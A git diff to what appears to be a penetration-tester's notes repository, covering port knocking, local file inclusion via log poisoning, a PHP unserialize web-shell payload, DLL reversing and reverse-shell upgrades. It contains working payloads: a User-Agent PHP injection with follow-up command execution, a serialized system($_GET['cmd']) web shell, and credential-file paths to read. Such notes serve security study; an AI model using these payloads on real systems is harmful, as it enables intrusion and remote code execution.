notes on reversing

enumeration/docs/port_knocking.md

@@ -0,0 +1,13 @@
+# Port Knocking
+
+* Open filtered port behind a firewall by knocking nicely
+
+## Usage
+
+* `knockd` 
+```sh
+knock <target-IP> <magicWords>
+```
+or
+* [arch wiki nmap script](https://wiki.archlinux.org/title/Port_knocking)
+* `nc -z`

exploit/web/local_file_inclusion.md

@@ -26,10 +26,17 @@ http://example.com/home?page=/etc/passwd
 ```sh
 curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: <TARGETIP>' -H 'User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'
 ```
-    * Follow up with a request to
+
-    ```HTTP
+* Follow up with a request to
-    curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
+
-    ```
+```HTTP
+curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
+```
+
+### /proc/self/fd
+* [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)
+*  Log poisoning and opening logfile via `/proc/self/fd/xx`.
+
 ### Base64 Encoding via PHP
 * Circumvent filter via encoding local files included ins a GET parameter value
 ```http
@@ -48,9 +55,11 @@ curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<
 * `/root/.ssh/id_rsa`
 * `/var/log/apache2/access.log`
 * `C:\boot.ini`
+* `/proc/self/fd/xx`
 
 ## Tricks
 
 * Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
 * Terminate query with `/.`
 * `..//..//..//file`, double slashes
+

exploit/web/php/unserialize.md

@@ -0,0 +1,20 @@
+# Unserialize
+
+* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize/)
+
+* Serialize via
+```php
+<?php
+class FormSubmit {
+    public $form_file = 'messages.php';
+    public $message = '<?php
+    if(isset($_GET[\'cmd\']))
+    {
+        system($_GET[\'cmd\']);
+    }
+?>';
+}
+
+print urlencode(serialize(new FormSubmit));
+?>
+```

reverse_engineering/docs/dll_reversing.md

@@ -0,0 +1,9 @@
+# DLL Reversing
+
+* Start DLL on its own with the help a wrapper
+```C#
+HMODULE dll = LoadLibraryA("DLL.DLL");
+typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y)
+Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName");
+Add(1, 2);
+```

reverse_engineering/docs/function_mangling.md

@@ -0,0 +1,4 @@
+# Function Decoration
+
+* Done to imported functions in order to do interpositioning and identify the variants of the function.
+* [name mangling](https://en.wikipedia.org/wiki/Name_mangling)

reverse_shells/docs/shell_upgrade.md

@@ -1,5 +1,9 @@
 # Upgrade Reverse Shell 
 
+* [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
+* [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/)
+* [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
+
 ## Via interpreter
 ### PHP
 * reverse shell
@@ -24,6 +28,11 @@ python -c 'import pty; pty.spawn("/bin/bash")'
 perl -e 'exec "/bin/sh";'
 ```
 
+### Script
+```sh
+/usr/bin/script -qc /bin/bash /dev/null
+```
+
 ## Next
 1. `ctrl` + `z`
 2. `stty echo -raw`